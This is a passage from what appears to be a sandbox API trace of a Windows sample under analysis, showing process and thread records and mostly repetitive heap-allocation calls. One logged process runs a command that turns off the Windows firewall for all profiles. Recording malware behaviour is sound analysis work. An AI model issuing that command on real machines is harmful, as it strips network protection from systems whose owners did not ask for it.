_wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.332] GetProcessHeap () returned 0x270000 [0114.332] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2846a0 | out: hHeap=0x270000) returned 1 [0114.332] GetProcessHeap () returned 0x270000 [0114.332] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12) returned 0x289ed0 [0114.332] lstrcmpW (lpString1="\\netsh.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.333] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\netsh.exe", lpCommandLine="netsh advfirewall set allprofiles state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1eed50*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh advfirewall set allprofiles state off", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eed00 | out: lpCommandLine="netsh advfirewall set allprofiles state off", lpProcessInformation=0x1eed00*(hProcess=0x54, hThread=0x50, dwProcessId=0x4fc, dwThreadId=0x570)) returned 1 [0115.289] CloseHandle (hObject=0x50) returned 1 [0115.289] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.289] GetProcessHeap () returned 0x270000 [0115.289] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28c310 | out: hHeap=0x270000) returned 1 [0115.289] GetEnvironmentStringsW () returned 0x28ad10* [0115.289] GetProcessHeap () returned 0x270000 [0115.289] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xae8) returned 0x28b800 [0115.290] FreeEnvironmentStringsW (penv=0x28ad10) returned 1 [0115.290] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0231.753] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1eec48 | out: lpExitCode=0x1eec48*=0x0) returned 1 [0231.753] CloseHandle (hObject=0x54) returned 1 [0231.753] _vsnwprintf (in: _Buffer=0x1eeeb8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eec58 | out: _Buffer="00000000") returned 8 [0231.753] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0231.754] GetProcessHeap () returned 0x270000 [0231.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b800 | out: hHeap=0x270000) returned 1 [0231.754] GetEnvironmentStringsW () returned 0x28ad10* [0231.754] GetProcessHeap () returned 0x270000 [0231.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0e) returned 0x28ce10 [0231.754] FreeEnvironmentStringsW (penv=0x28ad10) returned 1 [0231.754] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0231.754] GetProcessHeap () returned 0x270000 [0231.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce10 | out: hHeap=0x270000) returned 1 [0231.754] GetEnvironmentStringsW () returned 0x28ad10* [0231.754] GetProcessHeap () returned 0x270000 [0231.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0e) returned 0x28ce10 [0231.754] FreeEnvironmentStringsW (penv=0x28ad10) returned 1 [0231.754] GetProcessHeap () returned 0x270000 [0231.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x289ed0 | out: hHeap=0x270000) returned 1 [0231.754] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eed18 | out: lpAttributeList=0x1eed18) [0231.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.755] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0231.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.755] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0231.756] SetConsoleInputExeNameW () returned 0x1 [0231.756] GetConsoleOutputCP () returned 0x1b5 [0231.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0231.756] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0231.756] exit (_Code=0) Process: id = "6" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x47411000" os_pid = "0x564" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005ab2f" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 15 os_tid = 0x604 Thread: id = 16 os_tid = 0x3d4 Thread: id = 17 os_tid = 0x5a8 Thread: id = 18 os_tid = 0x40c [0115.250] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xced5e0 | out: lpSystemTimeAsFileTime=0xced5e0*(dwLowDateTime=0x2d2a4de0, dwHighDateTime=0x1d5f7c9)) [0115.251] GetCurrentProcessId () returned 0x564 [0115.251] GetCurrentThreadId () returned 0x40c [0115.251] GetTickCount () returned 0x114a554 [0115.251] QueryPerformanceCounter (in: lpPerformanceCount=0xced5e8 | out: lpPerformanceCount=0xced5e8*=22127429043) returned 1 [0115.251] malloc (_Size=0x100) returned 0x3e8e80 [0264.002] free (_Block=0x3e8e80) Thread: id = 19 os_tid = 0x7cc Thread: id = 20 os_tid = 0x620 Thread: id = 21 os_tid = 0x560 Thread: id = 25 os_tid = 0x83c Thread: id = 32 os_tid = 0xa80 Thread: id = 129 os_tid = 0x874 Process: id = "7" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x491be000" os_pid = "0x4fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x694" cmd_line = "netsh advfirewall set allprofiles state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0x570 [0117.028] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f990 | out: lpSystemTimeAsFileTime=0x14f990*(dwLowDateTime=0x2d8984e0, dwHighDateTime=0x1d5f7c9)) [0117.028] GetCurrentProcessId () returned 0x4fc [0117.028] GetCurrentThreadId () returned 0x570 [0117.028] GetTickCount () returned 0x114a7c4 [0117.028] QueryPerformanceCounter (in: lpPerformanceCount=0x14f998 | out: lpPerformanceCount=0x14f998*=22305172888) returned 1 [0117.030] GetModuleHandleW (lpModuleName=0x0) returned 0xc90000 [0117.030] __set_app_type (_Type=0x1) [0117.031] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc9ad14) returned 0x0 [0117.031] __wgetmainargs (in: _Argc=0xca55c0, _Argv=0xca55d0, _Env=0xca55c8, _DoWildCard=0, _StartInfo=0xca55dc | out: _Argc=0xca55c0, _Argv=0xca55d0, _Env=0xca55c8) returned 0 [0117.033] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.033] GetModuleHandleW (lpModuleName=0x0) returned 0xc90000 [0117.034] _vsnwprintf (in: _Buffer=0xca7a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x1474e8 | out: _Buffer="netsh>") returned 6 [0117.034] GetProcessHeap () returned 0x2c0000 [0117.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e07d0 [0117.034] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e07f0 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0810 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0830 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0850 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0870 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e08c0 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e08e0 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0900 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0920 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0940 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0960 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0980 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e09a0 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e09c0 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e09e0 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a00 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a20 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a40 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a60 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a80 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0aa0 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ac0 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ae0 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b00 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b20 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b40 [0117.040] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b60 [0117.040] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b80 [0117.040] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ba0 [0117.040] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0bc0 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0be0 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c00 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c20 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c40 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c60 [0117.108] GetProcessHeap () returned 0x2c0000 [0117.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c80 [0117.108] GetProcessHeap () returned 0x2c0000 [0117.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ca0 [0117.109] GetProcessHeap () returned 0x2c0000 [0117.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0cc0 [0117.109] GetProcessHeap () returned 0x2c0000 [0117.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ce0 [0117.109] GetProcessHeap () returned 0x2c0000 [0117.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d00 [0117.109] GetProcessHeap () returned 0x2c0000 [0117.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d20 [0117.110] GetProcessHeap () returned 0x2c0000 [0117.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d40 [0117.110] GetProcessHeap () returned 0x2c0000 [0117.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d60 [0117.110] GetProcessHeap () returned 0x2c0000 [0117.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d80 [0117.110] GetProcessHeap () returned 0x2c0000 [0117.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0da0 [0117.111] GetProcessHeap () returned 0x2c0000 [0117.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0dc0 [0117.111] GetProcessHeap () returned 0x2c0000 [0117.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0de0 [0117.111] GetProcessHeap () returned 0x2c0000 [0117.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e00 [0117.111] GetProcessHeap () returned 0x2c0000 [0117.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e20 [0117.112] GetProcessHeap () returned 0x2c0000 [0117.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e40 [0117.112] GetProcessHeap () returned 0x2c0000 [0117.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e60 [0117.112] GetProcessHeap () returned 0x2c0000 [0117.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e80 [0117.112] GetProcessHeap () returned 0x2c0000 [0117.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ea0 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ec0 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ee0 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f00 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f20 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f40 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f60 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f80 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0fa0 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0fc0 [0117.115] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0fe0 [0117.115] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1000 [0117.115] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1020 [0117.115] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1040 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1060 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e10c0 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e10e0 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1100 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1120 [0117.117] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1140 [0117.117] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1160 [0117.117] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1180 [0117.117] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e11a0 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e11c0 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e11e0 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1200 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1220 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1240 [0117.119] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1260 [0117.119] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1280 [0117.119] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e12a0 [0117.119] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e12c0 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e12e0 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1300 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1320 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1340 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1360 [0117.121] GetProcessHeap () returned 0x2c0000 [0117.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1380 [0117.121] GetProcessHeap () returned 0x2c0000 [0117.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e13a0 [0117.121] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e13c0 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e13e0 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1400 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1420 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1440 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1460 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1480 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e14a0 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e14c0 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e14e0 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1500 [0117.124] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1520 [0117.124] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1540 [0117.124] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1560 [0117.124] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1580 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e15a0 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e15c0 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e15e0 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1600 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1620 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1640 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1660 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1680 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e16a0 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e16c0 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e16e0 [0117.127] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1700 [0117.127] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1720 [0117.127] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1740 [0117.127] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1760 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1780 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e17a0 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 